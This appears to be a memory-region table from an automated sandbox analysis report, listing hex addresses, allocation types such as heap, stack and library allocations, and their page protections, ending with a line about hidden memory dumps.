4882000
|
trusted library allocation
|
page read and write
|
||
|
7103000
|
heap
|
page read and write
|
||
|
84E0000
|
trusted library allocation
|
page read and write
|
||
|
1B086504000
|
heap
|
page read and write
|
||
|
1B08478B000
|
heap
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C50000
|
trusted library allocation
|
page read and write
|
||
|
1B08472B000
|
heap
|
page read and write
|
||
|
A53457C000
|
stack
|
page read and write
|
||
|
4478000
|
trusted library allocation
|
page read and write
|
||
|
7F30000
|
trusted library allocation
|
page read and write
|
||
|
280162CF000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C92000
|
trusted library allocation
|
page read and write
|
||
|
8200000
|
heap
|
page read and write
|
||
|
7FF848C61000
|
trusted library allocation
|
page read and write
|
||
|
28013E2F000
|
heap
|
page read and write
|
||
|
84C0000
|
trusted library allocation
|
page read and write
|
||
|
7040000
|
heap
|
page read and write
|
||
|
28013FB0000
|
trusted library allocation
|
page read and write
|
||
|
8255000
|
heap
|
page read and write
|
||
|
28015A6D000
|
heap
|
page read and write
|
||
|
7087000
|
heap
|
page read and write
|
||
|
2801798D000
|
trusted library allocation
|
page read and write
|
||
|
59C000
|
stack
|
page read and write
|
||
|
5161000
|
trusted library allocation
|
page read and write
|
||
|
28013FA0000
|
heap
|
page execute and read and write
|
||
|
8BD000
|
heap
|
page read and write
|
||
|
1B08477A000
|
heap
|
page read and write
|
||
|
1B0864FF000
|
heap
|
page read and write
|
||
|
28017BA0000
|
trusted library allocation
|
page read and write
|
||
|
A5352CB000
|
stack
|
page read and write
|
||
|
A5346FE000
|
stack
|
page read and write
|
||
|
72EE000
|
stack
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
1B0867A5000
|
heap
|
page read and write
|
||
|
280171C9000
|
trusted library allocation
|
page read and write
|
||
|
1B0849FE000
|
heap
|
page read and write
|
||
|
1B0847DC000
|
heap
|
page read and write
|
||
|
280140A0000
|
heap
|
page read and write
|
||
|
109A4FE000
|
stack
|
page read and write
|
||
|
1CFB5B40000
|
heap
|
page read and write
|
||
|
7FF848C97000
|
trusted library allocation
|
page read and write
|
||
|
1B08678F000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
72A0000
|
heap
|
page execute and read and write
|
||
|
8D36000
|
direct allocation
|
page execute and read and write
|
||
|
A53407E000
|
stack
|
page read and write
|
||
|
1B084761000
|
heap
|
page read and write
|
||
|
1B0849F0000
|
heap
|
page read and write
|
||
|
109ABFE000
|
stack
|
page read and write
|
||
|
8220000
|
heap
|
page read and write
|
||
|
4590000
|
heap
|
page execute and read and write
|
||
|
28013E33000
|
heap
|
page read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
736E000
|
stack
|
page read and write
|
||
|
1B084783000
|
heap
|
page read and write
|
||
|
109A5FE000
|
stack
|
page read and write
|
||
|
4460000
|
heap
|
page readonly
|
||
|
1B084748000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
43F2000
|
trusted library allocation
|
page read and write
|
||
|
1B08477A000
|
heap
|
page read and write
|
||
|
7FF848CA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7ECD000
|
stack
|
page read and write
|
||
|
43EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0849FC000
|
heap
|
page read and write
|
||
|
1B08478D000
|
heap
|
page read and write
|
||
|
822E000
|
heap
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
1B08652B000
|
heap
|
page read and write
|
||
|
1B0847AD000
|
heap
|
page read and write
|
||
|
8430000
|
trusted library allocation
|
page read and write
|
||
|
93D000
|
heap
|
page read and write
|
||
|
28013DE9000
|
heap
|
page read and write
|
||
|
5D9000
|
stack
|
page read and write
|
||
|
7E47000
|
stack
|
page read and write
|
||
|
A53417E000
|
stack
|
page read and write
|
||
|
1B08477F000
|
heap
|
page read and write
|
||
|
28015B67000
|
heap
|
page execute and read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
5DD000
|
stack
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
2801799F000
|
trusted library allocation
|
page read and write
|
||
|
74BC000
|
stack
|
page read and write
|
||
|
7FF848ACB000
|
trusted library allocation
|
page read and write
|
||
|
7FF848AB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
2802E050000
|
heap
|
page read and write
|
||
|
934000
|
heap
|
page read and write
|
||
|
1B0847B6000
|
heap
|
page read and write
|
||
|
109A7FE000
|
stack
|
page read and write
|
||
|
7FF848C95000
|
trusted library allocation
|
page read and write
|
||
|
1B0847C1000
|
heap
|
page read and write
|
||
|
1B0847DC000
|
heap
|
page read and write
|
||
|
43F5000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0847C9000
|
heap
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
28025C11000
|
trusted library allocation
|
page read and write
|
||
|
7F290000
|
trusted library allocation
|
page execute and read and write
|
||
|
28013D00000
|
heap
|
page read and write
|
||
|
BA4000
|
trusted library allocation
|
page read and write
|
||
|
D336000
|
direct allocation
|
page execute and read and write
|
||
|
109AEFC000
|
stack
|
page read and write
|
||
|
1B086770000
|
heap
|
page read and write
|
||
|
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
|
4410000
|
trusted library allocation
|
page read and write
|
||
|
1B084761000
|
heap
|
page read and write
|
||
|
84F0000
|
direct allocation
|
page read and write
|
||
|
A5344F9000
|
stack
|
page read and write
|
||
|
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
|
4977000
|
trusted library allocation
|
page read and write
|
||
|
1B0849FA000
|
heap
|
page read and write
|
||
|
A53427E000
|
stack
|
page read and write
|
||
|
E736000
|
direct allocation
|
page execute and read and write
|
||
|
1B084650000
|
heap
|
page read and write
|
||
|
7FF5000
|
trusted library allocation
|
page read and write
|
||
|
1B08477E000
|
heap
|
page read and write
|
||
|
B90000
|
trusted library allocation
|
page read and write
|
||
|
28015A15000
|
heap
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page read and write
|
||
|
1B0864E1000
|
heap
|
page read and write
|
||
|
7FF848AC0000
|
trusted library allocation
|
page read and write
|
||
|
8400000
|
trusted library allocation
|
page execute and read and write
|
||
|
28015A10000
|
heap
|
page read and write
|
||
|
7FF848D20000
|
trusted library allocation
|
page read and write
|
||
|
860000
|
heap
|
page read and write
|
||
|
1B0864E8000
|
heap
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
1B0849F8000
|
heap
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
280167BD000
|
trusted library allocation
|
page read and write
|
||
|
B536000
|
direct allocation
|
page execute and read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
109A8FE000
|
stack
|
page read and write
|
||
|
4498000
|
heap
|
page read and write
|
||
|
7FF848ABD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CFB5940000
|
heap
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
1B0847AA000
|
heap
|
page read and write
|
||
|
471E000
|
stack
|
page read and write
|
||
|
51EE2FF000
|
unkown
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
1B0864EB000
|
heap
|
page read and write
|
||
|
28016104000
|
trusted library allocation
|
page read and write
|
||
|
A53467E000
|
stack
|
page read and write
|
||
|
1B0864E5000
|
heap
|
page read and write
|
||
|
7FF848B66000
|
trusted library allocation
|
page read and write
|
||
|
2802E08F000
|
heap
|
page read and write
|
||
|
A5341FC000
|
stack
|
page read and write
|
||
|
1B086794000
|
heap
|
page read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
7010000
|
heap
|
page read and write
|
||
|
6FCE000
|
stack
|
page read and write
|
||
|
51EE27B000
|
stack
|
page read and write
|
||
|
2801608E000
|
trusted library allocation
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
28016313000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
|
1B0847D6000
|
heap
|
page read and write
|
||
|
280160A6000
|
trusted library allocation
|
page read and write
|
||
|
942000
|
heap
|
page read and write
|
||
|
1B084630000
|
heap
|
page read and write
|
||
|
9736000
|
direct allocation
|
page execute and read and write
|
||
|
445E000
|
stack
|
page read and write
|
||
|
28025C1F000
|
trusted library allocation
|
page read and write
|
||
|
7F0E000
|
stack
|
page read and write
|
||
|
1B0847D6000
|
heap
|
page read and write
|
||
|
28015C00000
|
heap
|
page read and write
|
||
|
2801626C000
|
trusted library allocation
|
page read and write
|
||
|
28017988000
|
trusted library allocation
|
page read and write
|
||
|
1B0847D6000
|
heap
|
page read and write
|
||
|
99A000
|
heap
|
page read and write
|
||
|
451C000
|
stack
|
page read and write
|
||
|
8294000
|
heap
|
page read and write
|
||
|
28015AD3000
|
heap
|
page read and write
|
||
|
28013E05000
|
heap
|
page read and write
|
||
|
8160000
|
heap
|
page read and write
|
||
|
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
|
28015B60000
|
heap
|
page execute and read and write
|
||
|
475E000
|
stack
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
6E2D000
|
heap
|
page read and write
|
||
|
1B0846E0000
|
heap
|
page read and write
|
||
|
28017A2C000
|
trusted library allocation
|
page read and write
|
||
|
1B084785000
|
heap
|
page read and write
|
||
|
28025C31000
|
trusted library allocation
|
page read and write
|
||
|
B80000
|
trusted library section
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page execute and read and write
|
||
|
28015A20000
|
heap
|
page read and write
|
||
|
8249000
|
heap
|
page read and write
|
||
|
A53534B000
|
stack
|
page read and write
|
||
|
1B08473A000
|
heap
|
page read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
28013DEB000
|
heap
|
page read and write
|
||
|
BA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
70D2000
|
heap
|
page read and write
|
||
|
8C10000
|
direct allocation
|
page execute and read and write
|
||
|
469E000
|
stack
|
page read and write
|
||
|
820A000
|
heap
|
page read and write
|
||
|
1B08473A000
|
heap
|
page read and write
|
||
|
BB0000
|
trusted library allocation
|
page read and write
|
||
|
1B0847D6000
|
heap
|
page read and write
|
||
|
80D0000
|
trusted library allocation
|
page read and write
|
||
|
1B0847BF000
|
heap
|
page read and write
|
||
|
45DE000
|
stack
|
page read and write
|
||
|
7FF848D10000
|
trusted library allocation
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
1B084761000
|
heap
|
page read and write
|
||
|
1B0864E1000
|
heap
|
page read and write
|
||
|
28017B83000
|
trusted library allocation
|
page read and write
|
||
|
BF36000
|
direct allocation
|
page execute and read and write
|
||
|
280179B1000
|
trusted library allocation
|
page read and write
|
||
|
1CFB5950000
|
heap
|
page read and write
|
||
|
28016098000
|
trusted library allocation
|
page read and write
|
||
|
1B08479A000
|
heap
|
page read and write
|
||
|
280179C2000
|
trusted library allocation
|
page read and write
|
||
|
1B0864F7000
|
heap
|
page read and write
|
||
|
7DF4B3C70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2802DF76000
|
heap
|
page read and write
|
||
|
1B0847AD000
|
heap
|
page read and write
|
||
|
7095000
|
heap
|
page read and write
|
||
|
7FF848C70000
|
trusted library allocation
|
page execute and read and write
|
||
|
280160AA000
|
trusted library allocation
|
page read and write
|
||
|
1B0864F0000
|
heap
|
page read and write
|
||
|
1B0847AD000
|
heap
|
page read and write
|
||
|
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
|
956000
|
heap
|
page read and write
|
||
|
1B08650B000
|
heap
|
page read and write
|
||
|
1B084761000
|
heap
|
page read and write
|
||
|
5821000
|
trusted library allocation
|
page read and write
|
||
|
7F80000
|
trusted library allocation
|
page read and write
|
||
|
1B084785000
|
heap
|
page read and write
|
||
|
7FF848AB2000
|
trusted library allocation
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
461E000
|
stack
|
page read and write
|
||
|
1B0849C0000
|
heap
|
page read and write
|
||
|
28013D80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848B60000
|
trusted library allocation
|
page read and write
|
||
|
4570000
|
trusted library allocation
|
page read and write
|
||
|
1B08470E000
|
heap
|
page read and write
|
||
|
582B000
|
trusted library allocation
|
page read and write
|
||
|
455E000
|
stack
|
page read and write
|
||
|
4650000
|
heap
|
page read and write
|
||
|
28013DC3000
|
heap
|
page read and write
|
||
|
BA0000
|
trusted library allocation
|
page read and write
|
||
|
7430000
|
trusted library allocation
|
page read and write
|
||
|
93B000
|
heap
|
page read and write
|
||
|
AB36000
|
direct allocation
|
page execute and read and write
|
||
|
1B0849FA000
|
heap
|
page read and write
|
||
|
8500000
|
direct allocation
|
page read and write
|
||
|
97F000
|
heap
|
page read and write
|
||
|
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
|
5163000
|
trusted library allocation
|
page read and write
|
||
|
28015C11000
|
trusted library allocation
|
page read and write
|
||
|
1CFB5978000
|
heap
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
8420000
|
trusted library allocation
|
page read and write
|
||
|
6E39000
|
heap
|
page read and write
|
||
|
5831000
|
trusted library allocation
|
page read and write
|
||
|
73AD000
|
stack
|
page read and write
|
||
|
517F000
|
trusted library allocation
|
page read and write
|
||
|
855000
|
heap
|
page read and write
|
||
|
2802E0EF000
|
heap
|
page read and write
|
||
|
1CFB5CA5000
|
heap
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page read and write
|
||
|
2802DF50000
|
heap
|
page read and write
|
||
|
7F60000
|
trusted library allocation
|
page read and write
|
||
|
1B08470F000
|
heap
|
page read and write
|
||
|
1B0847A6000
|
heap
|
page read and write
|
||
|
28013F90000
|
trusted library allocation
|
page read and write
|
||
|
A5351CE000
|
stack
|
page read and write
|
||
|
1B0867A1000
|
heap
|
page read and write
|
||
|
1B08472B000
|
heap
|
page read and write
|
||
|
8292000
|
heap
|
page read and write
|
||
|
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
|
28025F07000
|
trusted library allocation
|
page read and write
|
||
|
1B086799000
|
heap
|
page read and write
|
||
|
28013DA0000
|
heap
|
page read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
|
1B0847DC000
|
heap
|
page read and write
|
||
|
A5343F8000
|
stack
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
28015E38000
|
trusted library allocation
|
page read and write
|
||
|
A5342FE000
|
stack
|
page read and write
|
||
|
2802E086000
|
heap
|
page read and write
|
||
|
8EF000
|
heap
|
page read and write
|
||
|
2802E10A000
|
heap
|
page read and write
|
||
|
1B08477A000
|
heap
|
page read and write
|
||
|
2802E131000
|
heap
|
page read and write
|
||
|
28013F70000
|
trusted library allocation
|
page read and write
|
||
|
1B086508000
|
heap
|
page read and write
|
||
|
1B086792000
|
heap
|
page read and write
|
||
|
280167C9000
|
trusted library allocation
|
page read and write
|
||
|
280179AD000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
28015B20000
|
heap
|
page execute and read and write
|
||
|
1B08650B000
|
heap
|
page read and write
|
||
|
7FF848C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
4808000
|
trusted library allocation
|
page read and write
|
||
|
1B0847C1000
|
heap
|
page read and write
|
||
|
2802E0D7000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CE0000
|
trusted library allocation
|
page read and write
|
There are 430 hidden memdumps, click here to show them.